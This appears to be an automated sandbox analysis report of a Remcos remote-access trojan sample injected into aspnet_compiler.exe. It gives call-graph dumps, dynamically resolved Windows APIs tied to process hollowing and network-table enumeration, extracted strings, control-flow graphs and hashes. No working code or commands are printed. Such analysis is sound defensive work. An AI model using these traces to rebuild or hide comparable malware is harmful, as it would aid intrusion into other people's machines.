47168->47416 47170 40e117 47417 401e13 11 API calls 47170->47417 47172 40e121 47418 401e13 11 API calls 47172->47418 47492 44243b 47174->47492 47177->46867 47178->46873 47179->46871 47180->46881 47181->46883 47182->46886 47183->46861 47185->46890 47186->46892 47191 44e949 47187->47191 47190 437a17 8 API calls 3 library calls 47190->46893 47194 44e966 47191->47194 47195 44e962 47191->47195 47193 4336da 47193->46896 47193->47190 47194->47195 47197 4489ad 47194->47197 47209 433d2c 47195->47209 47198 4489b9 ___scrt_is_nonwritable_in_current_image 47197->47198 47216 444acc EnterCriticalSection 47198->47216 47200 4489c0 47217 44ef64 47200->47217 47202 4489cf 47203 4489de 47202->47203 47228 448841 23 API calls 47202->47228 47230 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 47203->47230 47206 4489d9 47229 4488f7 GetStdHandle GetFileType 47206->47229 47207 4489ef __wsopen_s 47207->47194 47210 433d37 IsProcessorFeaturePresent 47209->47210 47211 433d35 47209->47211 47213 4341a4 47210->47213 47211->47193 47252 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47213->47252 47215 434287 47215->47193 47216->47200 47218 44ef70 ___scrt_is_nonwritable_in_current_image 47217->47218 47219 44ef94 47218->47219 47220 44ef7d 47218->47220 47231 444acc EnterCriticalSection 47219->47231 47239 445354 20 API calls __dosmaperr 47220->47239 47223 44efcc 47240 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 47223->47240 47224 44efa0 47224->47223 47232 44eeb5 47224->47232 47226 44ef82 __cftof __wsopen_s 47226->47202 47228->47206 47229->47203 47230->47207 47231->47224 47241 448706 47232->47241 47234 44eec7 47238 44eed4 47234->47238 47248 44772e 11 API calls 2 library calls 47234->47248 47236 44ef26 47236->47224 47249 446ac5 20 API calls __dosmaperr 47238->47249 47239->47226 47240->47226 47246 448713 _strftime 47241->47246 47242 448753 47251 445354 20 API calls __dosmaperr 47242->47251 47243 44873e RtlAllocateHeap 47244 448751 47243->47244 47243->47246 47244->47234 47246->47242 47246->47243 47250 442200 7 API calls 2 library calls 47246->47250 47248->47234 47249->47236 47250->47246 47251->47244 47252->47215 47253->46900 47255 44dddb 47254->47255 47256 44ddd2 47254->47256 47255->46905 47259 44dcc8 48 API calls 5 library calls 47256->47259 47258->46905 47259->47255 47261 41bd22 LoadLibraryA GetProcAddress 47260->47261 47262 41bd12 GetModuleHandleA GetProcAddress 47260->47262 47263 41bd4b 32 API calls 47261->47263 47264 41bd3b LoadLibraryA GetProcAddress 47261->47264 47262->47261 47263->46909 47264->47263 47423 41a63f FindResourceA 47265->47423 47268 43a88c _Yarn 21 API calls 47269 40e192 _Yarn 47268->47269 47426 401f86 47269->47426 47272 401eef 11 API calls 47273 40e1b8 47272->47273 47274 401eea 11 API calls 47273->47274 47275 40e1c1 47274->47275 47276 43a88c _Yarn 21 API calls 47275->47276 47277 40e1d2 _Yarn 47276->47277 47430 406052 47277->47430 47279 40e205 47279->46911 47281 401fcc 47280->47281 47438 402501 47281->47438 47283 401fea 47283->46914 47304 41afd6 47284->47304 47285 41b046 47286 401eea 11 API calls 47285->47286 47287 41b078 47286->47287 47288 401eea 11 API calls 47287->47288 47290 41b080 47288->47290 47289 41b048 47451 403b60 28 API calls 47289->47451 47293 401eea 11 API calls 47290->47293 47295 40d7c6 47293->47295 47294 41b054 47296 401eef 11 API calls 47294->47296 47305 40e8bd 11 API calls 47295->47305 47298 41b05d 47296->47298 47297 401eef 11 API calls 47297->47304 47299 401eea 11 API calls 47298->47299 47301 41b065 47299->47301 47300 401eea 11 API calls 47300->47304 47303 41bfa9 28 API calls 47301->47303 47303->47285 47304->47285 47304->47289 47304->47297 47304->47300 47443 403b60 28 API calls 47304->47443 47444 41bfa9 47304->47444 47305->46919 47306->46921 47307->46926 47308->46930 47309->46933 47310->46936 47312 401efe 47311->47312 47314 401f0a 47312->47314 47479 4021b9 11 API calls 47312->47479 47314->46940 47317 4021b9 47315->47317 47316 4021e8 47316->46942 47317->47316 47480 40262e 11 API calls _Deallocate 47317->47480 47319->46948 47320->46950 47321->46952 47322->46955 47323->46962 47481 401e8f 47324->47481 47326 40bee1 CreateMutexA GetLastError 47326->46966 47327->46927 47328->46931 47329->46937 47331->46958 47332->46954 47333->46973 47334->46961 47335->46972 47336->46980 47337->46990 47338->46983 47339->46996 47340->46974 47341->46979 47342->46988 47343->46994 47344->46997 47345->47000 47346->47003 47347->47005 47348->47007 47349->47009 47350->47012 47351->47018 47352->47024 47353->47029 47354->47036 47355->47038 47356->47044 47357->47017 47358->47023 47359->47027 47360->47033 47361->47042 47362->47045 47363->47050 47364->47056 47365->47060 47366->47065 47367->47069 47368->47030 47369->47034 47370->47043 47371->47049 47372->47052 47373->47055 47374->47062 47375->47064 47376->47068 47377->47072 47378->47074 47379->47076 47380->47078 47381->47080 47382->47082 47383->47084 47384->47086 47385->47088 47386->47091 47387->47094 47388->47097 47389->47099 47390->47101 47391->47105 47392->47107 47393->47109 47394->47113 47395->47119 47396->47127 47397->47132 47398->47136 47399->47114 47400->47121 47401->47129 47402->47140 47403->47115 47404->47120 47405->47123 47406->47128 47407->47144 47408->47148 47409->47152 47410->47157 47411->47147 47412->47154 47413->47161 47414->47165 47415->47168 47416->47170 47417->47172 47418->47149 47419->47156 47483 419e89 103 API calls 47420->47483 47421->46981 47424 40e183 47423->47424 47425 41a65c LoadResource LockResource SizeofResource 47423->47425 47424->47268 47425->47424 47427 401f8e 47426->47427 47433 402325 47427->47433 47429 401fa4 47429->47272 47431 401f86 28 API calls 47430->47431 47432 406066 47431->47432 47432->47279 47434 40232f 47433->47434 47436 40233a 47434->47436 47437 40294a 28 API calls 47434->47437 47436->47429 47437->47436 47439 40250d 47438->47439 47441 40252b 47439->47441 47442 40261a 28 API calls 47439->47442 47441->47283 47442->47441 47443->47304 47445 41bfae 47444->47445 47446 41bfcb 47445->47446 47448 41bfd2 47445->47448 47471 41bfe3 28 API calls 47446->47471 47452 41c552 47448->47452 47449 41bfd0 47449->47304 47451->47294 47453 41c55c __EH_prolog 47452->47453 47454 41c673 47453->47454 47455 41c595 47453->47455 47478 402649 22 API calls std::_Xinvalid_argument 47454->47478 47472 4026a7 28 API calls 47455->47472 47459 41c5a9 47473 41c536 28 API calls 47459->47473 47461 41c5dc 47462 41c603 47461->47462 47463 41c5f7 47461->47463 47475 41c7cf 11 API calls 47462->47475 47474 41c7b2 11 API calls 47463->47474 47466 41c601 47477 41c75a 11 API calls 47466->47477 47467 41c60f 47476 41c7cf 11 API calls 47467->47476 47470 41c63e 47470->47449 47471->47449 47472->47459 47473->47461 47474->47466 47475->47467 47476->47466 47477->47470 47479->47314 47480->47316 47482 401e94 47481->47482 47491 411637 62 API calls 47489->47491 47493 442447 _Atexit 47492->47493 47494 442460 47493->47494 47495 44244e 47493->47495 47516 444acc EnterCriticalSection 47494->47516 47528 442595 GetModuleHandleW 47495->47528 47498 442453 47498->47494 47529 4425d9 GetModuleHandleExW 47498->47529 47499 442505 47517 442545 47499->47517 47503 4424dc 47507 4424f4 47503->47507 47538 443475 5 API calls CatchGuardHandler 47503->47538 47505 442522 47520 442554 47505->47520 47506 44254e 47540 456499 5 API calls CatchGuardHandler 47506->47540 47539 443475 5 API calls CatchGuardHandler 47507->47539 47508 442467 47508->47499 47508->47503 47537 4431ef 20 API calls _Atexit 47508->47537 47516->47508 47541 444b14 LeaveCriticalSection 47517->47541 47519 44251e 47519->47505 47519->47506 47542 447973 47520->47542 47523 442582 47526 4425d9 _Atexit 8 API calls 47523->47526 47524 442562 GetPEB 47524->47523 47525 442572 GetCurrentProcess TerminateProcess 47524->47525 47525->47523 47527 44258a ExitProcess 47526->47527 47528->47498 47530 442626 47529->47530 47531 442603 GetProcAddress 47529->47531 47533 442635 47530->47533 47534 44262c FreeLibrary 47530->47534 47532 442618 47531->47532 47532->47530 47535 433d2c CatchGuardHandler 5 API calls 47533->47535 47534->47533 47536 44245f 47535->47536 47536->47494 47537->47503 47538->47507 47539->47499 47541->47519 47543 447998 47542->47543 47547 44798e 47542->47547 47548 447174 47543->47548 47545 433d2c CatchGuardHandler 5 API calls 47546 44255e 47545->47546 47546->47523 47546->47524 47547->47545 47549 4471a0 47548->47549 47550 4471a4 47548->47550 47549->47550 47553 4471c4 47549->47553 47555 447210 47549->47555 47550->47547 47552 4471d0 GetProcAddress 47554 4471e0 __crt_fast_encode_pointer 47552->47554 47553->47550 47553->47552 47554->47550 47556 447226 47555->47556 47557 447231 LoadLibraryExW 47555->47557 47556->47549 47558 447266 47557->47558 47559 44724e GetLastError 47557->47559 47558->47556 47561 44727d FreeLibrary 47558->47561 47559->47558 47560 447259 LoadLibraryExW 47559->47560 47560->47558 47561->47556

                                                          Executed Functions

                                                          Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                          • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 384173800-625181639
                                                          • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                          • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                          • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                          • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                          Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 480 442554-442560 call 447973 483 442582-44258e call 4425d9 ExitProcess 480->483 484 442562-442570 GetPEB 480->484 484->483 485 442572-44257c GetCurrentProcess TerminateProcess 484->485 485->483
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                          • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                          • ExitProcess.KERNEL32 ref: 0044258E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                          • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                          • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                          • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                          Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5 call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 85 40d9aa-40d9ac 79->85 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 88 40d9b5-40d9bc 85->88 89 40d9ae-40d9b0 85->89 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db-40d9e2 call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 120 40d9e4-40d9e9 call 40699d call 4064d0 109->120 121 40d9ee-40da01 call 401d64 call 401e8f 109->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40dadb call 401d64 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338c8 169->179 170->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436050 179->198 199 40dae0-40db1d call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 189->199 203 40dbf5-40dc6a call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338d1 call 401d64 call 40b125 197->203 198->203 199->163 203->220 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                          APIs
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                            • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                            • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                            • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040D790
                                                            • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                          • API String ID: 2830904901-1108828230
                                                          • Opcode ID: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                          • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                          • Opcode Fuzzy Hash: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                          • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                          Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                          • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                          • closesocket.WS2_32(?), ref: 0040481F
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                          • String ID:
                                                          • API String ID: 3658366068-0
                                                          • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                          • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                          • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                          • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                          Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 464 447210-447224 465 447226-44722f 464->465 466 447231-44724c LoadLibraryExW 464->466 467 447288-44728a 465->467 468 447275-44727b 466->468 469 44724e-447257 GetLastError 466->469 472 447284 468->472 473 44727d-44727e FreeLibrary 468->473 470 447266 469->470 471 447259-447264 LoadLibraryExW 469->471 474 447268-44726a 470->474 471->474 475 447286-447287 472->475 473->472 474->468 476 44726c-447273 474->476 475->467 476->475
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                          • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
